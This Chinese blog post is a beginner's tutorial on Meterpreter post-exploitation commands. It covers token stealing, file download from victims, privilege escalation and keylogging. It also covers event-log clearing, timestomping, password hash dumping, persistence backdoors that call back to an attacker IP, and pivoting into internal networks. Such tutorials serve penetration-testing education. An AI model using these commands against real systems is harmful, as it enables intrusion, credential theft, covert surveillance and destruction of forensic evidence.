Metasploit 新手指南(二)

在上一篇中介绍了Metasploit 大概的用法,所以这篇文章主要是介绍一下该工具的命令·进一步使用,如果有感兴趣的可以关注并私信我

Meterpreter系统命令:
1、getuid命令:用于返回目标机器上已经攻陷的或正在运行的用户名
2、getpid命令:用于返回当前运行meterpreter的进程ID号
3、ps命令:用于列出目标机器上当前运行的所有进程,该命令有助于识别目标中的各种软件和服务。
4、kill命令:杀死目标主机中指定的进程号
5、sysinfo命令:用于快速确认系统的信息
6、steal_token命令:尝试从目标主机上窃取一个假冒令牌
7、shell命令:用于产生shell提示符。
8、exit命令:用于终止会话
9、pwd命令:用于列出当前工作目录
10、search命令:用于搜所特定的文件类型等如:search -f *.doc -d c:\(搜所C盘目录下所有以.doc作为扩展名的文件)
11、download命令:用于下载文件:如download c:\secret.doc /root (将C盘目录下的secret文件下载到攻击方机器的root文件夹上)
12、del命令:删除文件或目录如:del c:\backdoor.exe 
13、session命令:用于切换会话;如:session -i
14、尝试从漏洞系统窃取一个假冒令牌。如: steal_token


权限提升:
1、getsystem:用于提升权限
2、migrate:用于从某个进程上下文迁移到其他进程:如假设是利用浏览器攻陷目标主机,但攻陷后目标主机关闭了浏览器等,就需要迁移到其它稳定的进程才能顺利地执行渗透测试任务:可以根据ps命令列出目标主机活跃地进程ID,假设是1234,则可以执行下面命令迁移:migrate 1234
与目标建立多重通信信道
1、execute命令:用于启动多重通信信道
2、channel -l 命令:可以列出可用信道
如果需要向某个信道发送或写入信息,则可以使用write 信道ID 如:write 5 进行
3、创建通信信道:execute -f 信道进程 -c如:execute -f cmd.exe -c
(-f 参数用于设置可执行命令,-c参数用于建立信道化的I/O,接下来也还可以继续运行该命令启动其它信道,而不用关闭当前信道。
4、如果想要读取某个信道的数据,则使用:read 该信道的ID
5、如果需要与某个信道进行交互,则使用interact命令并以该信道ID作为参数

更改文件属性:timestomp
1、首先查看目标主机上的文件:timestomp c:secret.doc -v
2、然后修改文件创建时间:timestomp c:\secret.doc -c “3/13/2013 13:13:23”(-c 参数用于修改创建时间,-m参数用于修改文件的修改时间,-a参数用于修改文件的最后一次访问时间)
3、最后在执行-v参数看看是否成功:timestomp c:\secret.doc -v

Meterperter网络命令
ipconfig  route  portfwd
1、ipconfig命令:用于展示目标主机上所有的网络配置情况
2、route命令:用于展示或修改目标主机上的本地IP路由表
格式:route subnet netmask gateway
3、portfwd命令:用于实现端口转发
如:portfwd -a-L 127.0.0.1 -l 4444 -h 69.54.16.18 -p 333(-a参数用于添加新的端口转发规则,-L 用于绑定转发数据包的IP地址,-l 参数用于指定攻击机器的端口,-c参数用于指定目标主机上的端口)

键盘监听命令:
1、getdesktop命令:该命令用于返回meterpreter会话当前的工作桌面
2、enumdesktop命令:该命令用于列出所有可访问桌面站和窗口站(一般与第一条命令结合使用)
3、setdesktop命令: 该命令用于将当前的meterpreter桌面更改到另一个可用的桌面站
4、keyscan_start命令:该命令用于在当前桌面启动键盘窃听器(该命令是在交互式桌面使用才有效果)
5、keyscan_stop命令:和上一条命令相反
6、keyscan_dump命令:该命令用于捕获或导出键盘记录
7、clearev命令:清除漏洞系统上的事件日志

补充:widows桌面常识:
Windows桌面划分为不同的会话,以便定义与Windows机器的交互方式,会话0表示的是控制台,其它会话表示远程桌面会话:
在这里插入图片描述
如上图可知:winsta0是唯一的交互站,这意味着以后只能与winsta0站进行交互,其它站都不行存在交互;winsta0包含defalut、disconnect、winlogon等三个不同的桌面:default桌面与我们在桌面执行的所有应用程序和任务相关联;disconnect与屏幕保护程序锁定桌面有关;winlogon与Windows登陆屏幕有关。
需要注意的是,每个桌面都有自己的键盘缓冲区,所以,如果需要对default桌面进行键盘窃听,就必须保证当前meterpreter活跃浏览器设置在session 0/winsta0/default。登录则是对应的winlogo桌面
使用小技巧:可以结合getdesktop、setdesktop,然后执行keyscan_start 、keyscan_dump 命令使用(当然,切换不同桌面也可以使用另外一个命令进行替换:首先使用ps命令列出所有进程的ID号,然后使用migrate命令进行迁移并可以再次检测当前活跃会话)

常见脚本:
1、scraper脚本:用于挖掘已经攻陷目标主机的大量信息,例如:注册表信息、口令hash、网络信息等保存在测试者机器上;格式:run scraper
2、winenum.rb脚本:用于收集目标主机信息
3、hashdump脚本:该命令在获得系统级的权限后使用可以获得口令的hash值,然后就可以使用相关工具进行破解登录(相关工具:http://www.md5decrypter.co.uk/)
4、Metsvc脚本:该命令适应于使用后门建立持久连接,该脚本是通过在目标主机上创建临时文件进行工作,并还会启动一个配套的多道处理程序自动回连到后门,-A参数可以实现此功能。格式:run metsvc -A
5、Persistence脚本:该脚本和上一个类似,但具备一些额外的功能:定期回连、自动运行等。如:run persistence -A -S -U -i 60 -p 4321 -r 192.168.10.135
(-A参数用于在目标主机上自动启动监听程序;-S参数将后门程序设置为系统启动时加载;-U参数将后门程序设置为用户登陆时自动执行;-i参数设置后门程序回连到代理处理程序的时间间隔;-p参数是端口;-r参数指定目标主机的IP地址)
渗透后进行扩展
arp_scanner脚本:该脚本可对内部网络进行arp扫描以发现其他可用系统
工作方式:首先执行background命令,然后在使用route命令添加路由表:
如:route add 10.10.10.128 255.255.255.0 1(add用于向路由表提交相关内容,然后是目标节点和默认网关IP,最后是活跃会话ID(当前是1));
然后在进行端口转发(portfwd命令)


本章就暂时介绍到这里,如果想要进一步了解可以关注我后期文章

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

流 逝 时 间

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值